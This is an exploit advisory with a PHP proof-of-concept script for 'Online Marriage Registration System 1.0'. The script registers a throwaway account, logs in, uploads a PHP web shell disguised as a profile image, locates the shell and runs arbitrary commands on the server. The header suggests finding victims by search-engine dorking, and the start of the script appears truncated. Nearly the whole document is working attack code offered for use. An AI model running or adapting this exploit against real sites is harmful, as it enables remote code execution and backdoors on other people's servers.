============================================================================================================================================= | # Title : Online Marriage Registration System 1.0 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This payload inject php code contains a back door. [+] Line 16 + 19 Set your Target. [+] save payload as poc.php [+] usage from cmd : C:\www\test>php 1.php -u http://127.0.0.1/omrs/ -c dir [+] payload : -c \n"); } function login($url, $mobile, $password) { $loginUrl = "{$url}/user/login.php"; $ch = curl_init($loginUrl); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'mobno' => $mobile, 'password' => $password, 'login' => '' ])); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); curl_exec($ch); curl_close($ch); // Extract PHPSESSID from cookie file $cookies = file_get_contents('cookie.txt'); preg_match('/PHPSESSID=(\w+);/', $cookies, $matches); return $matches[1] ?? null; } function upload($url, $cookie) { $uploadUrl = "{$url}/user/marriage-reg-form.php"; $fileData = [ 'husimage' => curl_file_create('shell.php', 'application/x-php', ''), 'wifeimage' => curl_file_create('test.jpg', 'image/jpeg') ]; $ch = curl_init($uploadUrl); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $fileData); curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_exec($ch); curl_close($ch); echo "[+] PHP shell uploaded\n"; } function getRemotePhpFiles($url) { $filesUrl = "{$url}/"; $ch = curl_init($filesUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); preg_match_all('/\d{10,42}\.php/', $response, $matches); return $matches[0]; } function execCommand($url, $webshell, $command) { $commandUrl = "{$url}/user/{$webshell}?cmd=" . urlencode($command); $ch = curl_init($commandUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); echo "[+] Command output\n" . $output . "\n"; } function register($mobile, $password, $url) { $signupUrl = "{$url}/user/signup.php"; $ch = curl_init($signupUrl); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'fname' => 'indoushka', 'lname' => 'indoushka', 'mobno' => $mobile, 'address' => 'indoushka', 'password' => $password, 'submit' => '' ])); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_exec($ch); curl_close($ch); echo "[+] Registered with mobile phone $mobile and password '$password'\n"; } $mobile = $mobile ?? strval(rand(100000000, 999999999)); $password = $password ?? 'inouvis-2022'; if ($password === 'inouvis-2022' || $mobile === null) { register($mobile, $password, $url); } $cookie = login($url, $mobile, $password); $initialPhpFiles = getRemotePhpFiles($url); upload($url, $cookie); $finalPhpFiles = getRemotePhpFiles($url); $webshell = array_diff($finalPhpFiles, $initialPhpFiles)[0]; execCommand($url, $webshell, $command); ?> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================